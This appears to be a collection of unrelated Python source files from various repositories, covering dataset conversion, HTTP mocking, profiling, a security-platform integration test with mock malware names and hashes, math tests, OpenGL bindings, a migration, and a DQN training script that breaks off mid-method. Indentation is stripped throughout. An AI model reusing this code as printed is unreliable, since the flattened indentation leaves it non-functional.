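#   python voc2coco.py /path/to/VOCdevkit -o /path/to/output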
def main():
args = parse_args()
devkit_path = args.devkit_path
out_dir = args.out_dir if args.out_dir else devkit_path
cv_core.mkdir_or_exist(out_dir)
year = None
years = []
if osp.isdir(osp.join(devkit_path, 'VOC2007')):
year = '2007'
years.append(year)
if osp.isdir(osp.join(devkit_path, 'VOC2012')):
year = '2012'
years.append(year)
if '2007' in years and '2012' in years:
year = ['2007', '2012']
if year == '2007':
prefix = 'voc07'
split = ['trainval', 'test'] # train集和test集
elif year == '2012':
prefix = 'voc12'
split = ['train', 'val'] # train集和test集
elif year == ['2007', '2012']:
prefix = 'voc0712'
split = [['trainval', 'train'], ['test', 'val']] # train集和test集
else:
raise NotImplementedError
for split_ in split:
if isinstance(split_, list):
dataset_name = prefix + '_' + split_[0]
else:
dataset_name = prefix + '_' + split_
print('processing {} ...'.format(dataset_name))
annotations_path = osp.join(out_dir, 'annotations')
cv_core.mkdir_or_exist(annotations_path)
out_file = osp.join(annotations_path, dataset_name + '.json')
if isinstance(split_, list):
filelists = []
xml_dirs = []
for i, s in enumerate(split_):
filelist = osp.join(devkit_path,
'VOC{}/ImageSets/Main/{}.txt'.format(year[i], s))
xml_dir = osp.join(devkit_path, 'VOC{}/Annotations'.format(year[i]))
filelists.append(filelist)
xml_dirs.append(xml_dir)
else:
filelists = osp.join(devkit_path, 'VOC{}/ImageSets/Main/{}.txt'.format(year, split_))
xml_dirs = osp.join(devkit_path, 'VOC{}/Annotations'.format(year))
_convert(filelists, xml_dirs, out_file)
print('Done!')
if __name__ == '__main__':
main()
|
examples/urllib3_chunked_response.py | Megarushing/pook | 304 | 12670055 | import pook
import urllib3
# Mock HTTP traffic only in the given context
with pook.use():
(pook.get('httpbin.org/chunky')
.reply(200)
.body(['returned', 'as', 'chunks'], chunked=True))
# Intercept request
http = urllib3.PoolManager()
r = http.request('GET', 'httpbin.org/chunky')
print('Chunks:', list(r.read_chunked()))
|
etc/run_notebooks.py | truongc2/data-describe | 294 | 12670079 | <filename>etc/run_notebooks.py
from pathlib import Path
import logging
import argparse
import json
import papermill as pm
def run_all_notebooks(args):
"""Run all notebooks in the example directory."""
for notebook in Path(__file__).parent.parent.glob("examples/*.ipynb"):
notebook_path = str(notebook.resolve())
if len(args.notebook_name) > 0:
if not any([x in notebook_path for x in args.notebook_name]):
logging.info(f"Skipping: {notebook_path}")
continue
nb = pm.execute_notebook(
notebook_path,
notebook_path,
request_save_on_cell_execute=True,
kernel_name="python3",
)
try:
nb["metadata"]["kernelspec"]["display_name"] = "Python 3"
nb["metadata"]["kernelspec"]["name"] = "python3"
except KeyError:
pass
with open(notebook, "w") as fp:
json.dump(nb, fp)
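# Example invocation (the notebook names are illustrative):
#   python etc/run_notebooks.py --notebook-name Data_Summary --notebook-name Correlations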
if __name__ == "__main__":
logging.basicConfig(level=logging.INFO)
parser = argparse.ArgumentParser()
parser.add_argument("--notebook-name", action="append")
args, _ = parser.parse_known_args()
run_all_notebooks(args)
|
06. Chapter_6/pandas/sklearn_line_profiler.py | Mikma03/High-performance-Python | 223 | 12670087 | import timeit
import pandas as pd
import matplotlib.pyplot
from sklearn.linear_model import base
from sklearn.linear_model import LinearRegression
import matplotlib.pyplot as plt
from line_profiler import LineProfiler
import numpy as np
from utility import ols_lstsq, ols_sklearn
# We learn that
#https://github.com/scikit-learn/scikit-learn/blob/1495f6924/sklearn/linear_model/base.py#L438
# LinearRegression.fit is expensive because
# of calls to check_X_y, _preprocess_data and linalg.lstsq
# https://github.com/scikit-learn/scikit-learn/blob/1495f6924/sklearn/linear_model/base.py#L101
# _preprocess_data
# has 3 expensive lines - check_array, np.asarray, np.average
#https://github.com/scikit-learn/scikit-learn/blob/1495f69242646d239d89a5713982946b8ffcf9d9/sklearn/utils/validation.py#L600
# check_X_y
# checks for array for certain characteristics and lengths
#
df = pd.read_pickle('generated_ols_data.pickle')
print(f"Loaded {df.shape} rows")
est = LinearRegression()
row = df.iloc[0]
X = np.arange(row.shape[0]).reshape(-1, 1).astype(np.float_)
lp = LineProfiler(est.fit)
print("Run on a single row")
lp.run("est.fit(X, row.values)")
lp.print_stats()
print("Run on 5000 rows")
lp.run("df[:5000].apply(ols_sklearn, axis=1)")
lp.print_stats()
lp = LineProfiler(base._preprocess_data)
lp.run("base._preprocess_data(X, row, fit_intercept=True)")
lp.print_stats()
lp = LineProfiler(base.check_X_y)
lp.run("base.check_X_y(X, y, accept_sparse=['csr', 'csc', 'coo'], y_numeric=True, multi_output=True)")
lp.print_stats()
#%lprun -f est_diagnosis.fit est_diagnosis.fit(np.arange(rowx.shape[0]).reshape(-1, 1), rowx.values)
#lp.run("est_diagnosis.fit(np.arange(rowx.shape[0]).reshape(-1, 1).astype(np.float_), y.values)")
#lp.run("base._preprocess_data(np.arange(rowx.shape[0]).reshape(-1, 1).astype(np.float_), rowx, fit_intercept=True)")
|
pyBN/inference/__init__.py | seuzmj/pyBN | 126 | 12670113 | from pyBN.inference.map_exact import *
from pyBN.inference.marginal_approx import *
from pyBN.inference.marginal_exact import * |
Packs/Cymulate/Integrations/Cymulate/Cymulate_test.py | diCagri/content | 799 | 12670122 | import demistomock as demisto
from Cymulate import cymulate_test, fetch_incidents, cymulate_get_incident_info, Client, CymulateModuleTypeEnum
BASE_URL = 'https://api.cymulate.com/v1/'
MOKE_TEST = {"success": True, "data": ["Phishing Awareness", "Web Application Firewall",
"Lateral Movement", "Data Exfiltration",
"Immediate Threats Intelligence", "Email Gateway",
"Endpoint Security", "Web Gateway", "Full Kill-Chain APT"]}
FETCH_INCIDENTS_TEST = {"success": True,
"data": [
{
"Id": "5dbeaf53a910862fa859491e",
"Name": " Ursnif infection with Dridex and Powershell Empire",
"Timestamp": "03/11/2019 05:43:31",
"InProgress": False
},
{
"Id": "5dbea88c357ca849ac41bb2e",
"Name": "Pcap and malware for an ISC diary (Emotet + Trickbot)",
"Timestamp": "03/11/2019 05:14:36",
"InProgress": False
},
{
"Id": "5d528f78705e364e9055033c",
"Name": "BlackSquid Drops XMRig Miner",
"Timestamp": "13/08/2019 06:22:48",
"InProgress": False
},
{
"Id": "5d25dc5d86d73c22203d919f",
"Name": "dll2",
"Timestamp": "10/07/2019 08:38:53",
"InProgress": False
},
{
"Id": "5cc7109ca842693cc0f15588",
"Name": "hot files test 8",
"Timestamp": "29/04/2019 10:56:28",
"InProgress": False
},
{
"Id": "5c8e6cbf3dd9fe08186d7b64",
"Name": "Hancitor malspam infections from 2018-08-13 and 2018-08-14",
"Timestamp": "17/03/2019 11:50:23",
"InProgress": False
}
]
}
CYMULATE_GET_INCIDENT_INFO_TEST = {"success": True,
"data": [
{
"Module": "Immediate Threats Intelligence",
"Penetration_Vector": "-",
"Attack_Payload": "2019-07-08-Ursnif-binary-retrieved-by-Word-macro_"
"2b999360-a3f9-11e9-980e-633d1efd31f3.exe",
"Name": " Ursnif infection with Dridex and Powershell Empire",
"Timestamp": "03/11/2019 05:45:47",
"Sha1": "ff57bfaed6db3379bbf69a19404a6e21668a7a52",
"Sha256": "0894e82d9397d909099c98fe186354591ae86a73230700f462b72ae36c700ddf",
"Md5": "ef99338df4078fab6e9a8cf6797a1d14",
"Status": "Penetrated",
"Attack_Vector": "Endpoint Security",
"Attack_Type": "Antivirus",
"Mitigation": "N/A",
"Description": "N/A",
"ID": "c1d33138a2101724889862152444ec7e",
"Related_URLS": "N/A",
"Related_Email_Addresses": "N/A"
}
]
}
TECHNICAL_INCIDENTS_IDS = ['5dbeaf53a910862fa859491e', '5dbea88c357ca849ac41bb2e', '5d528f78705e364e9055033c',
'5d25dc5d86d73c22203d919f', '5cc7109ca842693cc0f15588', '5c8e6cbf3dd9fe08186d7b64']
MOCK_TIMESTAMP = "2020-12-02T16%3A32%3A37"
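# URL-encoded form of "2020-12-02T16:32:37" ("%3A" is ':'), matching the last_fetch value used below.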
ATTACK_ID = "5dbeaf53a910862fa859491e"
def local_get_last_run():
return {}
def test_test_client(requests_mock):
    requests_mock.get(BASE_URL + 'user/modules', json=MOCK_TEST)
client = Client(
base_url=BASE_URL,
headers={"x-token": '<PASSWORD>'},
verify=False)
cymulate_test(client=client, is_fetch=False)
def test_fetch_incidents(mocker, requests_mock):
requests_mock.get(BASE_URL + 'immediate-threats/ids?from={}'.format(MOCK_TIMESTAMP),
json=FETCH_INCIDENTS_TEST)
for incident_id in TECHNICAL_INCIDENTS_IDS:
requests_mock.get(BASE_URL + 'immediate-threats/attack/technical/' + incident_id,
json=CYMULATE_GET_INCIDENT_INFO_TEST)
mocker.patch.object(demisto, 'params',
return_value={'fetch_time': MOCK_TIMESTAMP})
mocker.patch.object(demisto, 'getLastRun', side_effect=local_get_last_run)
client = Client(
base_url=BASE_URL,
headers={"x-token": '<PASSWORD>'},
verify=False)
next_run, incidents, remain_incidents = fetch_incidents(client=client,
module_type=CymulateModuleTypeEnum.IMMEDIATE_THREATS,
last_run={'last_fetch': '2020-12-02T16:32:37'},
first_fetch_time={},
only_penatrated=False,
limit=20,
integration_context=None)
assert len(incidents) == 6
def test_cymulate_get_incident_info(mocker, requests_mock):
mocker.patch.object(demisto, 'args', return_value={"module_type": CymulateModuleTypeEnum.IMMEDIATE_THREATS.name,
"attack_id": ATTACK_ID})
requests_mock.get(BASE_URL + 'immediate-threats/attack/technical/' + ATTACK_ID,
json=CYMULATE_GET_INCIDENT_INFO_TEST)
client = Client(
base_url=BASE_URL,
headers={"x-token": '<PASSWORD>'},
verify=False)
# Get incident's parent id
attack_id = demisto.args().get('attack_id')
technical_info = cymulate_get_incident_info(client=client, attack_id=attack_id)
assert(technical_info[0]['ID'] == CYMULATE_GET_INCIDENT_INFO_TEST['data'][0]['ID'])
|
titus/test/lib/testMath.py | jmilleralpine/hadrian | 127 | 12670138 | <gh_stars>100-1000
#!/usr/bin/env python
# Copyright (C) 2014 Open Data ("Open Data" refers to
# one or more of the following companies: Open Data Partners LLC,
# Open Data Research LLC, or Open Data Capital LLC.)
#
# This file is part of Hadrian.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
from titus.genpy import PFAEngine
from titus.errors import *
class TestLib1Math(unittest.TestCase):
def testProvideConstants(self):
engine, = PFAEngine.fromYaml('''
input: "null"
output: double
action:
- {m.pi: []}
''')
self.assertAlmostEqual(engine.action(None), 3.141592653589793, places=14)
engine, = PFAEngine.fromYaml('''
input: "null"
output: double
action:
- {m.e: []}
''')
self.assertAlmostEqual(engine.action(None), 2.718281828459045, places=14)
def testDoAbs(self):
engine, = PFAEngine.fromYaml('''
input: double
output: double
action:
- {m.abs: input}
''')
self.assertAlmostEqual(engine.action(-3.14), 3.14, places=2)
engine, = PFAEngine.fromYaml('''
input: int
output: int
action:
- {m.abs: input}
''')
self.assertEqual(engine.action(2147483647), 2147483647)
self.assertEqual(engine.action(-2147483647), 2147483647)
self.assertRaises(PFARuntimeException, lambda: engine.action(-2147483648))
engine, = PFAEngine.fromYaml('''
input: long
output: long
action:
- {m.abs: input}
''')
self.assertEqual(engine.action(9223372036854775807), 9223372036854775807)
self.assertEqual(engine.action(-9223372036854775807), 9223372036854775807)
self.assertRaises(PFARuntimeException, lambda: engine.action(-9223372036854775808))
def testDoAcos(self):
engine, = PFAEngine.fromYaml('''
input: double
output: double
action:
- {m.acos: input}
''')
self.assertEqual(str(engine.action(-10)), "nan")
self.assertAlmostEqual(engine.action(-1), 3.14, places=2)
self.assertAlmostEqual(engine.action(-0.8), 2.50, places=2)
self.assertAlmostEqual(engine.action(0), 1.57, places=2)
self.assertAlmostEqual(engine.action(0.8), 0.64, places=2)
self.assertAlmostEqual(engine.action(1), 0.00, places=2)
def testDoAsin(self):
engine, = PFAEngine.fromYaml('''
input: double
output: double
action:
- {m.asin: input}
''')
self.assertEqual(str(engine.action(-10)), "nan")
self.assertAlmostEqual(engine.action(-1), -1.57, places=2)
self.assertAlmostEqual(engine.action(-0.8), -0.93, places=2)
self.assertAlmostEqual(engine.action(0), 0.00, places=2)
self.assertAlmostEqual(engine.action(0.8), 0.93, places=2)
self.assertAlmostEqual(engine.action(1), 1.57, places=2)
def testDoAtan(self):
engine, = PFAEngine.fromYaml('''
input: double
output: double
action:
- {m.atan: input}
''')
self.assertAlmostEqual(engine.action(-1), -0.79, places=2)
self.assertAlmostEqual(engine.action(-0.8), -0.67, places=2)
self.assertAlmostEqual(engine.action(0), 0.00, places=2)
self.assertAlmostEqual(engine.action(0.8), 0.67, places=2)
self.assertAlmostEqual(engine.action(1), 0.79, places=2)
def testDoAtan2(self):
engine, = PFAEngine.fromYaml('''
input: double
output: double
action:
- {m.atan2: [input, 1]}
''')
self.assertAlmostEqual(engine.action(-1), -0.79, places=2)
self.assertAlmostEqual(engine.action(-0.8), -0.67, places=2)
self.assertAlmostEqual(engine.action(0), 0.00, places=2)
self.assertAlmostEqual(engine.action(0.8), 0.67, places=2)
self.assertAlmostEqual(engine.action(1), 0.79, places=2)
def testCeil(self):
engine, = PFAEngine.fromYaml('''
input: double
output: double
action:
- {m.ceil: input}
''')
self.assertEqual(engine.action(-3.2), -3)
self.assertEqual(engine.action(0), 0)
self.assertEqual(engine.action(3.2), 4)
def testCopysign(self):
engine, = PFAEngine.fromYaml('''
input: double
output: double
action:
- {m.copysign: [5, input]}
''')
self.assertEqual(engine.action(-3.2), -5)
self.assertEqual(engine.action(0), 5)
self.assertEqual(engine.action(3.2), 5)
def testCos(self):
engine, = PFAEngine.fromYaml('''
input: double
output: double
action:
- {m.cos: input}
''')
self.assertAlmostEqual(engine.action(-22.5), -0.87, places=2)
self.assertAlmostEqual(engine.action(-0.5), 0.88, places=2)
self.assertAlmostEqual(engine.action(0), 1.00, places=2)
self.assertAlmostEqual(engine.action(0.5), 0.88, places=2)
self.assertAlmostEqual(engine.action(22.5), -0.87, places=2)
def testCosh(self):
engine, = PFAEngine.fromYaml('''
input: double
output: double
action:
- {m.cosh: input}
''')
self.assertAlmostEqual(engine.action(-22.5), 2955261031.51, places=2)
self.assertAlmostEqual(engine.action(-0.5), 1.13, places=2)
self.assertAlmostEqual(engine.action(0), 1.00, places=2)
self.assertAlmostEqual(engine.action(0.5), 1.13, places=2)
self.assertAlmostEqual(engine.action(22.5), 2955261031.51, places=2)
def testExp(self):
engine, = PFAEngine.fromYaml('''
input: double
output: double
action:
- {m.exp: input}
''')
self.assertAlmostEqual(engine.action(-22.5), 0.00, places=2)
self.assertAlmostEqual(engine.action(-0.5), 0.61, places=2)
self.assertAlmostEqual(engine.action(0), 1.00, places=2)
self.assertAlmostEqual(engine.action(0.5), 1.65, places=2)
self.assertAlmostEqual(engine.action(22.5), 5910522063.02, places=2)
def testExpm1(self):
engine, = PFAEngine.fromYaml('''
input: double
output: double
action:
- {m.expm1: input}
''')
self.assertAlmostEqual(engine.action(-22.5), -1.00, places=2)
self.assertAlmostEqual(engine.action(-0.5), -0.39, places=2)
self.assertAlmostEqual(engine.action(0), 0.00, places=2)
self.assertAlmostEqual(engine.action(0.5), 0.65, places=2)
self.assertAlmostEqual(engine.action(22.5), 5910522062.02, places=2)
def testFloor(self):
engine, = PFAEngine.fromYaml('''
input: double
output: double
action:
- {m.floor: input}
''')
self.assertEqual(engine.action(-3.2), -4)
self.assertEqual(engine.action(0), 0)
self.assertEqual(engine.action(3.2), 3)
def testHypot(self):
engine, = PFAEngine.fromYaml('''
input: double
output: double
action:
- {m.hypot: [input, 3.5]}
''')
self.assertAlmostEqual(engine.action(-22.5), 22.77, places=2)
self.assertAlmostEqual(engine.action(-0.5), 3.54, places=2)
self.assertAlmostEqual(engine.action(0), 3.50, places=2)
self.assertAlmostEqual(engine.action(0.5), 3.54, places=2)
self.assertAlmostEqual(engine.action(22.5), 22.77, places=2)
def testLn(self):
engine, = PFAEngine.fromYaml('''
input: double
output: double
action:
- {m.ln: input}
''')
self.assertEqual(str(engine.action(-1)), "nan")
self.assertEqual(str(engine.action(0)), "-inf")
self.assertAlmostEqual(engine.action(0.00001), -11.51, places=2)
self.assertAlmostEqual(engine.action(0.5), -0.69, places=2)
self.assertAlmostEqual(engine.action(22.5), 3.11, places=2)
def testLog10(self):
engine, = PFAEngine.fromYaml('''
input: double
output: double
action:
- {m.log10: input}
''')
self.assertEqual(str(engine.action(-1)), "nan")
self.assertEqual(str(engine.action(0)), "-inf")
self.assertAlmostEqual(engine.action(0.00001), -5.00, places=2)
self.assertAlmostEqual(engine.action(0.5), -0.30, places=2)
self.assertAlmostEqual(engine.action(22.5), 1.35, places=2)
def testArbitraryBaseLog(self):
engine, = PFAEngine.fromYaml('''
input: int
output: double
action:
- {m.log: [5.5, input]}
''')
self.assertAlmostEqual(engine.action(2), 2.46, places=2)
self.assertAlmostEqual(engine.action(5), 1.06, places=2)
self.assertAlmostEqual(engine.action(10), 0.74, places=2)
self.assertAlmostEqual(engine.action(16), 0.61, places=2)
self.assertRaises(PFARuntimeException, lambda: engine.action(0))
self.assertRaises(PFARuntimeException, lambda: engine.action(-1))
    def testLn1p(self):
engine, = PFAEngine.fromYaml('''
input: double
output: double
action:
- {m.ln1p: input}
''')
self.assertEqual(str(engine.action(-2)), "nan")
self.assertEqual(str(engine.action(-1)), "-inf")
self.assertAlmostEqual(engine.action(-0.99999), -11.51, places=2)
self.assertAlmostEqual(engine.action(-0.99999), -11.51, places=2)
self.assertAlmostEqual(engine.action(0.0), 0.00, places=2)
self.assertAlmostEqual(engine.action(0.00001), 0.00, places=2)
self.assertAlmostEqual(engine.action(0.5), 0.41, places=2)
self.assertAlmostEqual(engine.action(22.5), 3.16, places=2)
def testRound(self):
engine, = PFAEngine.fromYaml('''
input: double
output: long
action:
- {m.round: input}
''')
self.assertEqual(engine.action(-3.8), -4)
self.assertEqual(engine.action(-3.5), -3)
self.assertEqual(engine.action(-3.2), -3)
self.assertEqual(engine.action(0), 0)
self.assertEqual(engine.action(3.2), 3)
self.assertEqual(engine.action(3.5), 4)
self.assertEqual(engine.action(3.8), 4)
self.assertEqual(engine.action(9.223372036800000e+18), 9223372036800000000)
self.assertRaises(PFARuntimeException, lambda: engine.action(9.223372036854777e+18))
self.assertEqual(engine.action(-9.223372036854776e+18), -9223372036854775808)
self.assertRaises(PFARuntimeException, lambda: engine.action(-9.223372036854777e+18))
def testRint(self):
engine, = PFAEngine.fromYaml('''
input: double
output: double
action:
- {m.rint: input}
''')
self.assertEqual(engine.action(-3.8), -4)
self.assertEqual(engine.action(-3.5), -4)
self.assertEqual(engine.action(-3.2), -3)
self.assertEqual(engine.action(0), 0)
self.assertEqual(engine.action(3.2), 3)
self.assertEqual(engine.action(3.5), 4)
self.assertEqual(engine.action(3.8), 4)
def testSignum(self):
engine, = PFAEngine.fromYaml('''
input: double
output: double
action:
- {m.signum: input}
''')
self.assertEqual(engine.action(-3.2), -1)
self.assertEqual(engine.action(0), 0)
self.assertEqual(engine.action(3.2), 1)
self.assertEqual(engine.action(1.0), 1)
def testSin(self):
engine, = PFAEngine.fromYaml('''
input: double
output: double
action:
- {m.sin: input}
''')
self.assertAlmostEqual(engine.action(-22.5), 0.49, places=2)
self.assertAlmostEqual(engine.action(-0.5), -0.48, places=2)
self.assertAlmostEqual(engine.action(0), 0.00, places=2)
self.assertAlmostEqual(engine.action(0.5), 0.48, places=2)
self.assertAlmostEqual(engine.action(22.5), -0.49, places=2)
def testSinh(self):
engine, = PFAEngine.fromYaml('''
input: double
output: double
action:
- {m.sinh: input}
''')
self.assertAlmostEqual(engine.action(-22.5), -2955261031.51, places=2)
self.assertAlmostEqual(engine.action(-0.5), -0.52, places=2)
self.assertAlmostEqual(engine.action(0), 0.00, places=2)
self.assertAlmostEqual(engine.action(0.5), 0.52, places=2)
self.assertAlmostEqual(engine.action(22.5), 2955261031.51, places=2)
def testSqrt(self):
engine, = PFAEngine.fromYaml('''
input: double
output: double
action:
- {m.sqrt: input}
''')
self.assertEqual(str(engine.action(-1)), "nan")
self.assertAlmostEqual(engine.action(0), 0.00, places=2)
self.assertAlmostEqual(engine.action(0.5), 0.71, places=2)
self.assertAlmostEqual(engine.action(22.5), 4.74, places=2)
def testTan(self):
engine, = PFAEngine.fromYaml('''
input: double
output: double
action:
- {m.tan: input}
''')
self.assertAlmostEqual(engine.action(-10.5), -1.85, places=2)
self.assertAlmostEqual(engine.action(-0.5), -0.55, places=2)
self.assertAlmostEqual(engine.action(0), 0.00, places=2)
self.assertAlmostEqual(engine.action(0.5), 0.55, places=2)
self.assertAlmostEqual(engine.action(10.5), 1.85, places=2)
def testTanh(self):
engine, = PFAEngine.fromYaml('''
input: double
output: double
action:
- {m.tanh: input}
''')
self.assertAlmostEqual(engine.action(-22.5), -1.00, places=2)
self.assertAlmostEqual(engine.action(-0.5), -0.46, places=2)
self.assertAlmostEqual(engine.action(0), 0.00, places=2)
self.assertAlmostEqual(engine.action(0.5), 0.46, places=2)
self.assertAlmostEqual(engine.action(22.5), 1.00, places=2)
# def testErf(self):
# engine, = PFAEngine.fromYaml('''
# input: double
# output: double
# action:
# - {m.special.erf: input}
# ''')
# self.assertAlmostEqual(engine.action(-22.5), -1.00, places=2)
# self.assertAlmostEqual(engine.action(-0.5), -0.52, places=2)
# self.assertAlmostEqual(engine.action(0), 0.00, places=2)
# self.assertAlmostEqual(engine.action(0.5), 0.52, places=2)
# self.assertAlmostEqual(engine.action(22.5), 1.00, places=2)
if __name__ == "__main__":
unittest.main()
|
nmtpytorch/layers/pool.py | tejas1995/nmtpytorch | 420 | 12670144 | import torch
class Pool(torch.nn.Module):
"""A pool layer with mean/max/sum/last options."""
def __init__(self, op_type, pool_dim, keepdim=True):
super().__init__()
self.op_type = op_type
self.pool_dim = pool_dim
self.keepdim = keepdim
assert self.op_type in ["last", "mean", "max", "sum"], \
"Pool() operation should be mean, max, sum or last."
if self.op_type == 'last':
self.__pool_fn = lambda x: x.select(
self.pool_dim, -1).unsqueeze(0)
else:
if self.op_type == 'max':
self.__pool_fn = lambda x: torch.max(
x, dim=self.pool_dim, keepdim=self.keepdim)[0]
elif self.op_type == 'mean':
self.__pool_fn = lambda x: torch.mean(
x, dim=self.pool_dim, keepdim=self.keepdim)
elif self.op_type == 'sum':
self.__pool_fn = lambda x: torch.sum(
x, dim=self.pool_dim, keepdim=self.keepdim)
def forward(self, x):
return self.__pool_fn(x)
def __repr__(self):
return "Pool(op_type={}, pool_dim={}, keepdim={})".format(
self.op_type, self.pool_dim, self.keepdim)
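# Illustrative usage sketch (the tensor shape is an assumption):
#   pool = Pool('mean', pool_dim=0, keepdim=False)
#   hs = torch.rand(7, 32, 256)   # (seq_len, batch, hidden)
#   ctx = pool(hs)                # -> (32, 256): mean over the time dimension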
|
deep-rl/lib/python2.7/site-packages/OpenGL/raw/GL/APPLE/vertex_array_range.py | ShujaKhalid/deep-rl | 210 | 12670162 | <reponame>ShujaKhalid/deep-rl<gh_stars>100-1000
'''Autogenerated by xml_generate script, do not edit!'''
from OpenGL import platform as _p, arrays
# Code generation uses this
from OpenGL.raw.GL import _types as _cs
# End users want this...
from OpenGL.raw.GL._types import *
from OpenGL.raw.GL import _errors
from OpenGL.constant import Constant as _C
import ctypes
_EXTENSION_NAME = 'GL_APPLE_vertex_array_range'
def _f( function ):
return _p.createFunction( function,_p.PLATFORM.GL,'GL_APPLE_vertex_array_range',error_checker=_errors._error_checker)
GL_STORAGE_CACHED_APPLE=_C('GL_STORAGE_CACHED_APPLE',0x85BE)
GL_STORAGE_CLIENT_APPLE=_C('GL_STORAGE_CLIENT_APPLE',0x85B4)
GL_STORAGE_SHARED_APPLE=_C('GL_STORAGE_SHARED_APPLE',0x85BF)
GL_VERTEX_ARRAY_RANGE_APPLE=_C('GL_VERTEX_ARRAY_RANGE_APPLE',0x851D)
GL_VERTEX_ARRAY_RANGE_LENGTH_APPLE=_C('GL_VERTEX_ARRAY_RANGE_LENGTH_APPLE',0x851E)
GL_VERTEX_ARRAY_RANGE_POINTER_APPLE=_C('GL_VERTEX_ARRAY_RANGE_POINTER_APPLE',0x8521)
GL_VERTEX_ARRAY_STORAGE_HINT_APPLE=_C('GL_VERTEX_ARRAY_STORAGE_HINT_APPLE',0x851F)
@_f
@_p.types(None,_cs.GLsizei,ctypes.c_void_p)
def glFlushVertexArrayRangeAPPLE(length,pointer):pass
@_f
@_p.types(None,_cs.GLenum,_cs.GLint)
def glVertexArrayParameteriAPPLE(pname,param):pass
@_f
@_p.types(None,_cs.GLsizei,ctypes.c_void_p)
def glVertexArrayRangeAPPLE(length,pointer):pass
|
lemur/migrations/versions/4fe230f7a26e_.py | dck25/lemur | 1,656 | 12670175 | """Add 'ports' column to certificate_associations table
Revision ID: 4fe230f7a26e
Revises: <KEY>
Create Date: 2021-05-07 10:57:16.964743
"""
# revision identifiers, used by Alembic.
revision = '4fe230f7a26e'
down_revision = '<KEY>'
import sqlalchemy as sa
from alembic import op
from sqlalchemy.dialects import postgresql
def upgrade():
# Add the "ports" column
op.add_column('certificate_associations', sa.Column('ports', postgresql.ARRAY(sa.Integer()), nullable=True))
# Make the existing foreign key columns non-nullable
op.alter_column('certificate_associations', 'domain_id',
existing_type=sa.INTEGER(),
nullable=False)
op.alter_column('certificate_associations', 'certificate_id',
existing_type=sa.INTEGER(),
nullable=False)
def downgrade():
# Make the existing foreign key columns nullable
op.alter_column('certificate_associations', 'certificate_id',
existing_type=sa.INTEGER(),
nullable=True)
op.alter_column('certificate_associations', 'domain_id',
existing_type=sa.INTEGER(),
nullable=True)
# Drop the "ports" column
op.drop_column('certificate_associations', 'ports')
|
train_DQN_script.py | gordicaleksa/pytorch-learn-reinforcement-learning | 102 | 12670183 | """
Implementation of the original DQN Nature paper:
https://storage.googleapis.com/deepmind-media/dqn/DQNNaturePaper.pdf
Some of the complexity is captured via wrappers, but the main components, such as the DQN model itself,
the training loop, and the memory-efficient replay buffer, are implemented from scratch.
Some modifications:
* Using Adam instead of RMSProp
"""
import os
import argparse
import time
import copy
import numpy as np
import torch
from torch import nn
import matplotlib.pyplot as plt
from torch.optim import Adam
from torch.utils.tensorboard import SummaryWriter
import utils.utils as utils
from utils.replay_buffer import ReplayBuffer
from utils.constants import *
from models.definitions.DQN import DQN
class ActorLearner:
def __init__(self, config, env, replay_buffer, dqn, target_dqn, last_frame):
self.start_time = time.time()
self.config = config
self.env = env
self.last_frame = last_frame # always keeps the latest frame from the environment
self.replay_buffer = replay_buffer
# DQN Models
self.dqn = dqn
self.target_dqn = target_dqn
# Logging/debugging-related
self.debug = config['debug']
self.log_freq = config['log_freq']
self.episode_log_freq = config['episode_log_freq']
self.grads_log_freq = config['grads_log_freq']
self.checkpoint_freq = config['checkpoint_freq']
self.tensorboard_writer = SummaryWriter()
self.huber_loss = []
self.best_episode_reward = -np.inf
self.best_dqn_model = None # keeps a deep copy of the best DQN model so far (best = highest episode reward)
# MSE/L2 between [-1,1] and L1 otherwise (as stated in the Nature paper) aka "Huber loss"
self.loss = nn.SmoothL1Loss()
self.optimizer = Adam(self.dqn.parameters(), lr=config['learning_rate'])
self.grad_clip_value = config['grad_clipping_value']
self.acting_learning_step_ratio = config['acting_learning_step_ratio']
self.num_warmup_steps = config['num_warmup_steps']
self.batch_size = config['batch_size']
self.gamma = config['gamma'] # discount factor
self.learner_cnt = 0
self.target_dqn_update_interval = config['target_dqn_update_interval']
# should perform a hard or a soft update of target DQN weights
self.tau = config['tau']
def collect_experience(self):
# We're collecting more experience than we're doing weight updates (4x in the Nature paper)
for _ in range(self.acting_learning_step_ratio):
last_index = self.replay_buffer.store_frame(self.last_frame)
state = self.replay_buffer.fetch_last_state() # state = 4 preprocessed last frames for Atari
action = self.sample_action(state)
new_frame, reward, done_flag, _ = self.env.step(action)
self.replay_buffer.store_action_reward_done(last_index, action, reward, done_flag)
if done_flag:
new_frame = self.env.reset()
self.maybe_log_episode()
self.last_frame = new_frame
if self.debug:
self.visualize_state(state)
self.env.render()
self.maybe_log()
def sample_action(self, state):
if self.env.get_total_steps() < self.num_warmup_steps:
action = self.env.action_space.sample() # initial warm up period - no learning, acting randomly
else:
with torch.no_grad():
action = self.dqn.epsilon_greedy(state)
return action
def get_number_of_env_steps(self):
return self.env.get_total_steps()
def learn_from_experience(self):
current_states, actions, rewards, next_states, done_flags = self.replay_buffer.fetch_random_states(self.batch_size)
# Better than detaching: in addition to target dqn not being a part of the computational graph it also
# saves time/memory because we're not storing activations during forward propagation needed for the backprop
with torch.no_grad():
# shape = (B, NA) -> (B, 1), where NA - number of actions
# [0] because max returns (values, indices) tuples
next_state_max_q_values = self.target_dqn(next_states).max(dim=1, keepdim=True)[0]
# shape = (B, 1), TD targets. We need (1 - done) because when we're in a terminal state the next
# state Q value should be 0 and we only use the reward information
target_q_values = rewards + (1 - done_flags) * self.gamma * next_state_max_q_values
# shape = (B, 1), pick those Q values that correspond to the actions we made in those states
current_state_q_values = self.dqn(current_states).gather(dim=1, index=actions)
loss = self.loss(target_q_values, current_state_q_values)
self.huber_loss.append(loss.item())
self.optimizer.zero_grad()
loss.backward() # compute the gradients
if self.grad_clip_value is not None: # potentially clip gradients for stability reasons
nn.utils.clip_grad_norm_(self.dqn.parameters(), self.grad_clip_value)
self.optimizer.step() # update step
self.learner_cnt += 1
# Periodically update the target DQN weights (coupled to the number of DQN weight updates and not # env steps)
if self.learner_cnt % self.target_dqn_update_interval == 0:
if self.tau == 1.:
print('Update target DQN (hard update)')
self.target_dqn.load_state_dict(self.dqn.state_dict())
